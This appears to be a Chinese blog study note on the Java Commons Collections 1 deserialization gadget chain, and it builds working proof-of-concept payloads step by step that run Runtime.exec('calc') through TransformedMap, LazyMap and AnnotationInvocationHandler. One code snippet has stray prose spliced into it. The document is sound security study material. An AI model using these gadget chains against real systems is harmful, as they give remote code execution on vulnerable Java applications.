Java CommonsCollections1链学习


Java CommonsCollections1链学习

前言

Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类。
作为Apache开源项⽬的重要组件,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,⽽正 是因为在⼤量web应⽤程序中这些类的实现以及⽅法的调⽤,这导致了反序列化⽤漏洞的普遍性和严重性。
Apache Commons Collections中有⼀个特殊的接口,其中有⼀个实现该接口的类可以通过调用 Java的反射机制来调用任意函数,叫做InvokerTransformer。
apache commons-collections组件反序列化漏洞的反射链也称为CC链,自从apache commons-collections组件爆出第一个java反序列化漏洞后,就像打开了java安全的新世界大门一样,之后很多java中间件相继都爆出反序列化漏洞。

环境

CommonsCollections <= 3.2.1
jdk8u66 < 8u71
可以去下载旧版本。

CommonsCollections jar包获取方式

1.Maven仓库获取
commons-collections

最重要的一点:CC包版本3.1-3.2.1
2.Maven项目导入

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

CommonsCollections1链

ysoserial中给出的链

Gadget chain:
    ObjectInputStream.readObject()
        AnnotationInvocationHandler.readObject()
            Map(Proxy).entrySet()
                AnnotationInvocationHandler.invoke()
                    LazyMap.get()
                        ChainedTransformer.transform()
                            ConstantTransformer.transform()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Class.getMethod()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.getRuntime()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.exec()

Transformer接口

Transformer是一个接口类,提供了一个对象转换方法transform(接收一个对象,然后对对象作一些操作并输出):

package org.apache.commons.collections;
public interface Transformer {
    Object transform(Object var1);
}

Transformer接口是基于三个类实现的,InvokerTransformer,ChainedTransformer,ConstantTransformer。

InvokerTransformer类

transform方法为:

public Object transform(Object input) {
    if (input == null) {
        return null;
    } else {
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
            return method.invoke(input, this.iArgs);
        } catch (NoSuchMethodException var5) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException var6) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException var7) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
        }
    }
}

我们先看一下它的 transform 方法,传入一个对象,然后反射调用。方法值,参数类型,参数都是可控的。
其构造器代码如下,这里其实就是一个很标准的任意方法调用。

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    this.iMethodName = methodName;
    this.iParamTypes = paramTypes;
    this.iArgs = args;
}

尝试利用该方法调用计算器

正常反射调用Runtime.exec的正常写法为java.lang.Runtime.getRuntime().exec("calc");
会有疑问,为啥不写成java.lang.Runtime.exec("calc");呢,这是因为exec不是一个static方法,在java里必须通过实例化调用。
那为啥不写成

Runtime x=new Runtime();
x.exec("calc");

这是因为,Runtimeconstructorprivate的,不能直接new出来。但是可以通过getRuntime new一个出来。

import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        InvokerTransformer x=new InvokerTransformer(
                "exec",
                new Class[]{String.class},
                new Object[]{"calc"});
        x.transform(runtime);
    }
}

ChainedTransformer类

接下来看这个类的transform函数

public Object transform(Object object) {
    for(int i = 0; i < this.iTransformers.length; ++i) {
        object = this.iTransformers[i].transform(object);
    }
    return object;
}

由此函数可知,该函数会让上一个Transformer的transform结果作为下一个Transformer的transform的输入,以此类推。
观察其构造函数

public Transformer[] getTransformers() {
    return this.iTransformers;
}

发现iTransformers数组是用户自己定义的。
可以修改payload构造

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        Transformer d=new ChainedTransformer(new Transformer[]{
                new InvokerTransformer(
                    "exec",
                    new Class[]{String.class},
                    new Object[]{"calc"})
        });
        d.transform(runtime);
    }
}

ConstantTransformer类

public Object transform(Object input) {
    return this.iConstant;
}

接受一个对象返回一个常量,无论接收什么对象都返回 iConstant
这个常量在构造函数当中

public ConstantTransformer(Object constantToReturn) {
    this.iConstant = constantToReturn;一种是TransformedMap,另一种Lazymap,ysoserial用的是第二种,下面我会分别聊这两种实现方法
}

也就相当于把构造器里的参数直接return了,和input没啥关系。这个可以作为我们的起点。
再构造

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(runtime),
                new InvokerTransformer(
                    "exec",
                    new Class[]{String.class},
                    new Object[]{"calc"})
        });
        //payload序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("attack.ser"));
        oos.writeObject(d);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("attack.ser"));
        Transformer a=(ChainedTransformer)ois.readObject();
        d.transform(null);
    }
}

运行后会有报错。

原因是Runtime类的定义没有继承Serializable类,是不支持反序列化的,请注意。

二次反射绕过Serializable限制

既然我们可以通过ChainedTransformer执行任意代码,那么我们自然可以执行一些反射方法,来得到Runtime类。也就是要执行Runtime.class.getMethod("getRuntime")
再分析一下InvokerTransformer类中的Transform方法

Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs); 

也就是说,第二行getMethod方法没法获取到getRuntime
那有没有办法呢?答案是二次反射。我们利用第二行代码getMethod调用另一个getMethod出来,然后在第三行调用原来cls的invoke。然后,再弄一个InvokerTransformer调用invoke方法把getMethod(“getRuntime”)搞出来。
换句话说,利用反射调一个getMethod(“getRuntime”)方法,再利用反射调一个invoke方法

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[] {String.class, Class[].class},
                        new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[] {Object.class, Object[].class },
                        new Object[] {null, new Object[0] }),
                new InvokerTransformer(
                    "exec",
                    new Class[]{String.class},
                    new Object[]{"calc"})
        });
        //payload序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("attack.ser"));
        oos.writeObject(d);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("attack.ser"));
        Transformer a=(ChainedTransformer)ois.readObject();
        d.transform(null);
    }
}

成功调出计算器

与下面的代码作用相同

 public static void main(String[] args) throws Exception {
        //x[0],object=""
        Class s = Class.forName("java.lang.Class");
        //x[1],object="java.lang.Runtime"
        Object o = s.getMethod("getMethod", new Class[]{String.class, Class[].class}).invoke(Class.forName("java.lang.Runtime"), "getRuntime", new Class[0]);
        System.out.println(o + "\n\n");
        //x[2],object="java.lang.Runtime.getRuntime()"
        s = o.getClass();
        o = s.getMethod("invoke", new Class[]{Object.class, Object[].class}).invoke(o, null, new Object[0]);
        System.out.println(s + "\n" + o + "\n\n");
        //x[3],object=
        Object o1 = Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime"));
        System.out.println(o1);
}

Map

有两种Map的实现方法,一种是TransformedMap,另一种Lazymap,ysoserial用的是第二种,下面我会分别聊这两种实现方法。

TransformedMap

查看源码

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
    }

protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    super(map);
    this.keyTransformer = keyTransformer;
    this.valueTransformer = valueTransformer;
}

protected Object transformKey(Object object) {
    return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}

protected Object transformValue(Object object) {
    return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}

public Object put(Object key, Object value) {
    key = this.transformKey(key);
    value = this.transformValue(value);
    return this.getMap().put(key, value);
}

当该类在调用put函数时,接收一个map进来,分别对 key 和 Value 进行一些操作,会执行transform函数,最后的执行结果会被添加到map里。
尝试一下

import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.collections.Transformer;
import java.util.HashMap;
import java.util.Map;

interface Test extends Transformer {
    public Object transform(Object input);
}

class Test1 implements Test, Transformer {
    public Object transform(Object input) {
        return "x";
    }
}

class Test2 implements Test {
    public Object transform(Object input) {
        return "d";
    }
}

public class map {
    public static void main(String[] args) throws Exception {
        Map innerMap = new HashMap();
        System.out.println(innerMap);
        Map map = TransformedMap.decorate(innerMap, new Test1(), new Test2());
        map.put("value", "value");
        System.out.println(map);
    }
}


更改payload:

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        });
        //Map
        Map map = new HashMap();
        map.put("value", "value");
        Map map1 = TransformedMap.decorate(map, null, d);
        //payload序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("attack.ser"));
        oos.writeObject(map1);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("attack.ser"));
        Map map2=(Map)ois.readObject();
        map2.put("value", "1");
    }
}

成功弹出计算器。

接下来寻找readObjectput的联系,这个类就是sun.reflect.annotation.AnnotationInvocationHandler

AbstractInputCheckedMapDecorator类

接下来我们分析 AnnotationInvocationHandler 类,需要注意的时他不是public,只能在所属包下访问到,所以我们通过反射获取。
看看AnnotationInvocationHandler类下的readObject函数。

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
    var1.defaultReadObject();
    AnnotationType var2 = null;
    try {
        var2 = AnnotationType.getInstance(this.type);
    } catch (IllegalArgumentException var9) {
        throw new InvalidObjectException("Non-annotation type in annotation serial stream");
    }
    Map var3 = var2.memberTypes();
    Iterator var4 = this.memberValues.entrySet().iterator();
    while(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        if (var7 != null) {
            Object var8 = var5.getValue();
            if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
            }
        }
    }
}

发现在里面有赋值操作var5.setValue,不管它值是什么总之只要赋值就能执行我们的命令。
由于AnnotationInvocationHandler类的构造函数的第一个参数继承Annotation,所以第一个变量可以在改包底选一个,即可。
同时发现var3里面有一组map数据,会把用户输入的map数据的每一组key值在其var3在寻找有无key值有则不为空,进入判断则可执行

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

import java.lang.annotation.Documented;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        });
        //Map
        Map map = new HashMap();
        map.put("value", "key");
        Map map1 = TransformedMap.decorate(map, null, d);
        //
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ct = cls.getDeclaredConstructor(Class.class, Map.class);
        ct.setAccessible(true);
        Object o = ct.newInstance(Target.class, map1);
        //payload序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("attack.ser"));
        oos.writeObject(o);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("attack.ser"));
        ois.readObject();
    }
}

Target.class是因为第一个参数规定了泛型,必须是Annotation的实现。对着Annotation接口ctrl+alt+b即可搜索实现。
而且,这里map.put("value", "key");第一个参数必须为value,具体分析可见Java反序列化学习–从URLDNS到CommonsCollections1-7

成功调出计算器。

Lacymap类

看看Lazymap类,发现其get函数在获取key所对应的数据时,如果当key不存在,则调用transform函数,并把执行结果作为该key所对应的数据,并添加到到map里面。

public static Map decorate(Map map, Transformer factory) {
    return new LazyMap(map, factory);
}
protected LazyMap(Map map, Factory factory) {
    super(map);
    if (factory == null) {
        throw new IllegalArgumentException("Factory must not be null");
    } else {
        this.factory = FactoryTransformer.getInstance(factory);
    }
}
public Object get(Object key) {
    if (!super.map.containsKey(key)) {
        Object value = this.factory.transform(key);
        super.map.put(key, value);
        return value;
    } else {
        return super.map.get(key);
    }
}

发现其get函数在获取key所对应的数据时,如果当key不存在,则调用transform函数,并把执行结果作为该key所对应的数据,并添加到到map里面。
改payload

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

import java.lang.annotation.Documented;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        });
        //Map
        Map map = new HashMap();
        Map map1 = LazyMap.decorate(map, d);
        map1.get("key");
    }
}

动态处理

对一段代码进行分析,程序执行了invoke方法。

class expHandler implements InvocationHandler {
    protected Map map;

    public expHandler(Map map) {
        this.map = map;
    }

    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        if (method.getName().compareTo("put") == 0) {
            System.out.println("Hook Method: " + method.getName());
            map.put("hi", "xd");
        }
        return method.invoke(this.map, args);
    }
}

public class cc1 {
    public static void main(String[] args) throws Exception {
        InvocationHandler handler = new expHandler(new HashMap());
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
        proxyMap.put("hi", "sir");
        System.out.println(proxyMap);
}

发现输出的结果是先去执行invoke,当匹配不到,则按正常执行
AnnotationInvocationHandler类其实和InvocationHandler差不多里都有invoke,AnnotationInvocationHandler类下的invoke里面使用的get函数,所以从这块切入。

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

import java.lang.annotation.Documented;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer d=new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        });
        //Map
        Map map = new HashMap();
        Map map1 = LazyMap.decorate(map, d);
        //
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ct = cls.getDeclaredConstructor(Class.class, Map.class);
        ct.setAccessible(true);
        //
        InvocationHandler handler = (InvocationHandler) ct.newInstance(Target.class, map1);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
        Object o = ct.newInstance(Target.class, proxyMap);
        //payload序列化
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("attack.ser"));
        oos.writeObject(o);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("attack.ser"));
        ois.readObject();
    }
}


成功调出。

总结

到动调那块已经基本晕了,等完了看看后面的链加深理解后再回来看看,或者结合一些题目来看。等完了填坑吧。

参考链接:
Java CC链1 学习
Java反序列化学习–从URLDNS到CommonsCollections1-7
Java安全入门(二)——CC链1 分析+详解
Java反序列化之CC1链分析
Java安全研究——反序列化漏洞之CC链


Author: kingkb
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !